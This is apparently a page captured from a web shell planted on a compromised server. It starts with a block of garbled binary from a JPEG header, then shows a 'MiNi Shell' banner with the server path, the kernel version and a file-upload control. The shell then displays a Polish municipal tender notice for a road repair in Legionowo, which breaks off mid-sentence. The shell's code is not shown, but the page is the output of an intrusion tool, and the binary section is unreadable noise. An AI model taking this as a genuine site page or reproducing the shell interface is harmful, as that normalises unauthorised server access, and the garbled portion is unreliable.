JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210922/0018916401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont ulicy Kwiatowej w Legionowie na odc. od ul. Gajowej do ul. Zakopiańskiej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Legionowo Urząd Miasta Legionowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000524832</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">marsz. Józefa Piłsudskiego 41</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Legionowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@um.legionowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.legionowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont ulicy Kwiatowej w Legionowie na odc. od ul. Gajowej do ul. Zakopiańskiej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f669604a-1b99-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00189164</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001598/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Naprawa nawierzchni jezdni i zjazdów fragmentu ul. Kwiatowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.legionowo.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/legionowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">[...]4.<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, odbywa się przy<br/>użyciu strony internetowej https://platformazakupowa.pl/pn/legionowo5. Przesłanie przez Wykonawcę<br/>pytań o wyjaśnienie treści SWZ, oświadczeń, wniosków, zawiadomień lub informacji w inny sposób niż<br/>wskazany, może skutkować nie dotarciem oświadczeń, wniosków, zawiadomień lub informacji do<br/>komisji przetargowej w wyznaczonym terminie. Korespondencja taka, nie będzie brana pod uwagę<br/>przez komisję przetargową podczas czynności badania i oceny ofert.6. Oferty, oświadczenia, o których<br/>mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy Pzp, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym<br/>mowa w art. 118 ust. 3 ustawy Pzp, zwane dalej "zobowiązaniem podmiotu udostępniającego zasoby",<br/>pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w<br/>przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne, z zastrzeżeniem formatów, o których mowa w art. 66 ust.<br/>1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych.7. Informacje, oświadczenia lub<br/>dokumenty, inne niż określone w ust. 6, przekazywane w postępowaniu, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z<br/>dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako<br/>tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji<br/>elektronicznej tj. przy użyciu strony internetowej https://platformazakupowa.pl/pn/legionowo8. W<br/>przypadku przekazywania w postępowaniu dokumentu elektronicznego w formacie poddającym dane<br/>kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem<br/>wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym.[...]12. Minimalne wymagania techniczne umożliwiające<br/>korzystanie ze strony https://platformazakupowa.pl/pn/legionowo to 1) dowolna przeglądarka<br/>internetowa w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki<br/>typu „cookies”2) łącze internetowe o przepustowości, co najmniej 256 kb/s,3) komputer klasy PC lub<br/>MAC, o następującej konfiguracji: pamięć min. 2 GB RAM, procesor o taktowaniu min. 2 GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje.4) Platforma<br/>jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli.13. Występuje limit<br/>objętości plików lub spakowanych folderów w zakresie całej oferty lub wniosku do ilości 10 plików lub<br/>spakowanych folderów przy maksymalnej wielkości 150 MB.14. Szczegółowe informacje techniczne i<br/>organizacyjne wysyłania i odbioru dokumentów przy użyciu strony<br/>https://platformazakupowa.pl/pn/legionowo znajdują się w Regulaminie oraz instrukcjach dostępnych<br/>na portalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Rz.271.33.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest remont ulicy Kwiatowej w Legionowie na odc. od ul. Gajowej do ul. Zakopiańskiej.<br/> 2. W ramach zamówienia przewidziano remont ulicy Kwiatowej w Legionowie na odcinku od ul. Zakopiańskiej do ul. Gajowej w celu poprawy warunków bezpieczeństwa ruchu poprzez poprawę stanu technicznego elementów układu drogowego. Zakres remontu uwzględnia remont elementów układu drogowego na odcinku ok. 500 m długości, tj. jezdni, chodników i zjazdów, bez wprowadzenia istotnych zmian w geometrii układu drogowego. Przewidziano remont jezdni, przełożenie chodników i zjazdów oraz wymianę krawężników przy zachowaniu istniejących geometrii. Opracowanie zakłada odtworzenie istniejącej geometrii jezdni z zachowaniem normatywnych spadków poprzecznych i podłużnych. W rejonie skrzyżowania z ul. Gajową w celu uspokojenia ruchu przewidziano wyniesione skrzyżowanie. W ramach zakresu robót przewidziano również odtworzenie istniejącego progu zwalniającego oraz wykonanie elementów uspokojenia ruchu, tzw. „szykan” w celu zakrzywiania toru jazdy pojazdów samochodowych. W celu zabezpieczenia jezdni i ścieżki rowerowej pomiędzy jezdnią, a ścieżką przewidziano wykonanie opaski z kostki brukowej w miejscu opaski z kruszywa łamanego. Lokalnie przewidziano korektę łuków na skrzyżowaniach w celu dostosowania ich parametrów do obowiązujących normatywów.<br/> 3. Na odcinku od ul. Gajowej do ul. Zakopiańskiej przewidziano remont nawierzchni chodników z wykorzystaniem materiału z rozbiórki. W celu uzupełnienia brakujących ilości nawierzchni należy użyć materiału udostępnionego przez zamawiającego. Lokalnie zakłada się uzupełnienie podbudów. Zakłada się również wymianę krawężników i obrzeży drogowych w rejonie przekładanych chodników. Spadek poprzeczny chodnika – 2,0% w kierunku jezdni, szerokość nawierzchni chodnika min. 2,0 m.<br/> 4. Na odcinku od ul. Gajowej do ul. Zakopiańskiej przewidziano remont nawierzchni zjazdów z wykorzystaniem materiału z rozbiórki. W celu uzupełnienia brakujących ilości nawierzchni należy użyć materiału wykonawcy. Lokalnie zakłada się uzupełnienie podbudów. Zakłada się również wymianę krawężników i/lub obrzeży drogowych w rejonie przekładanych zjazdów. Spadek poprzeczny zjazdów należy dostosować do istniejących uwarunkowań terenowych, maks. 5,0% (podłużny). Szerokość nawierzchni zjazdów należy odtworzyć zgodnie ze stanem istniejącym lub dostosować do istniejących bram wjazdowych.<br/> Planowana jest miejscowa przebudowa ścieżki rowerowej w celu dostosowania niwelety do projektowanego wyniesionego skrzyżowania.<br/> Na remontowanym odcinku drogi przewidziano wymianę istniejących wpustów ulicznych.<br/> Miejsca łączenia nowych i starych nawierzchni bitumicznych oraz istniejących nawierzchni bitumicznych z elementami brukarskimi należy uszczelnić bitumiczną masą zalewową.<br/> W ramach robót budowlanych przewiduje się do wykonania:<br/> • roboty przygotowawcze,<br/> • roboty rozbiórkowe,<br/> • wykonanie korytowania pod projektowane konstrukcje nawierzchni,<br/> • ułożenie krawężników, obrzeży,<br/> • wykonanie warstw podbudowy,<br/> • wykonanie nawierzchni z mieszanek mineralno-bitumicznych,<br/> • wykonanie nawierzchni chodnika i zjazdów,<br/> • regulacje urządzeń infrastruktury technicznej oraz częściowa wymiana elementów odwodnienia,<br/> • roboty wykończeniowe,<br/> • wdrożenie stałej organizacji ruchu.<br/> Szczegółowy zakres robót określa plan zagospodarowania terenu (obejmujący odcinek od ul. Gajowej do ul. Zakopiańskiej), przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót oraz projekt stałej organizacji ruchu (obejmujący odcinek od ul. Gajowej do ul. Zakopiańskiej). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233330-1 - Fundamentowanie ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232460-4 - Roboty sanitarne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233270-2 - Malowanie nawierzchni parkingów</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45233292-2 - Instalowanie urządzeń ochronnych</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">80 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy ocenie ofert i wyborze oferty najkorzystniejszej będzie<br/>postępować zgodnie z wymaganiami ustawy oraz kierować się przesłankami określonymi w kryteriach<br/>oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.4.) Nazwa i opis warunków udziału w postępowaniu.<br/>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu określone w ogłoszeniu zgodnie z art. 112 ust. 2 ustawy Pzp, dotyczące:<br/>1) zdolności technicznej lub zawodowej.<br/>Ocena zdolności wykonawcy do należytego wykonania zamówienia<br/>2. W celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu<br/>dotyczących zdolności zawodowej - zamawiający wyraża jako minimalne poziomy:<br/>1) Wykonanie, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednej roboty budowlanej,<br/>każda obejmująca wykonanie nawierzchni utwardzonej asfaltowej o powierzchni min. 2.000 m2<br/>3. W celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu<br/>dotyczących zdolności technicznej - zamawiający wyraża jako minimalne poziomy:<br/>1) Dysponowanie kierownikiem budowy, który posiada uprawnienia budowlane w specjalności<br/>inżynieryjnej drogowej uprawniające do kierowania robotami budowlanymi.<br/>4. Przez ww. uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane, o których<br/>mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im ważne<br/>uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub<br/>odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę<br/>lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich<br/>Unii Europejskiej.<br/>5. W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej,<br/>Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym<br/>Handlu (EFTA) – stron umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art. 4a<br/>ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów<br/>budownictwa), osoby wyznaczone do realizacji zamówienia posiadają uprawnienia budowlane<br/>do kierowania robotami budowlanymi, wyszczególnione wyżej jeżeli:<br/>1) nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej<br/>wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium<br/>Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień budowlanych do kierowania<br/>robotami budowlanymi, oraz<br/>2) posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku braku<br/>decyzji o uznaniu kwalifikacji zawodowych zostały spełnione w stosunku do tych osób<br/>wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o samorządach<br/>zawodowych architektów oraz inżynierów budownictwa, dotyczące świadczenia usług<br/>transgranicznych.<br/>6. Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie<br/>postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Dla udokumentowania spełnienia wymaganych warunków udziału w postępowaniu przez<br/>wykonawcę oraz braku podstaw do wykluczenia, o którym mowa w art. 57 ust. 1 ustawy Prawo<br/>zamówień publicznych, zamawiający żąda złożenia wraz z ofertą aktualnych na dzień składania ofert:<br/>1) oświadczenia wykonawcy składanego na podstawie art. 125 ust. 1 ustawy Pzp, dotyczącego<br/>spełniania warunków udziału oraz braku podstaw wykluczenia w postępowaniu, zgodnie z<br/>załącznikiem nr 2 do SWZ – dokument w formie elektronicznej (opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>Uwaga<br/>I. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o którym<br/>mowa w pkt 1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te<br/>potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie,<br/>w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak<br/>podstaw wykluczenia.<br/>2) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby,<br/>przedstawia, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby – zgodnie z załącznikiem nr 3 do SWZ -<br/>dokument w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym podmiotu udostępniającego<br/>zasoby.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w tym spółki cywilne) dołączają do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy -<br/>załącznik nr 5 do SWZ - dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>3. W celu oceny, czy wykonawca polegając na zdolnościach innych podmiotów na zasadach<br/>określonych w art. 118 ust. 1 ustawy Pzp, będzie dysponował niezbędnymi zasobami na potrzeby<br/>realizacji danego zamówienia w stopniu umożliwiającym należyte wykonanie oraz oceny, czy stosunek<br/>łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wykonawca<br/>składa wraz z ofertą, zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia (zgodnie z załącznikiem nr 4 do SWZ pn. „Wzór zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia” – dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym tego podmiotu – lub inny podmiotowy<br/>środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów.<br/>Treść dokumentu powinna określać w szczególności:<br/>– zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>– sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>– czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega<br/>w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia, zrealizuje roboty budowlane, których wskazane zdolności dotyczą.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4. Wykaz dokumentów i oświadczeń które wykonawca składa w<br/>postępowaniu na wezwanie zamawiającego (art. 274 ust. 1 ustawy Pzp.) w celu potwierdzenia<br/>okoliczności, o których mowa w art. 57 pkt 2 ustawy Pzp (dot. spełnienia warunków udziału w<br/>postępowaniu oraz braku podstaw do wykluczenia) - aktualnych na dzień ich złożenia:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów, z innym 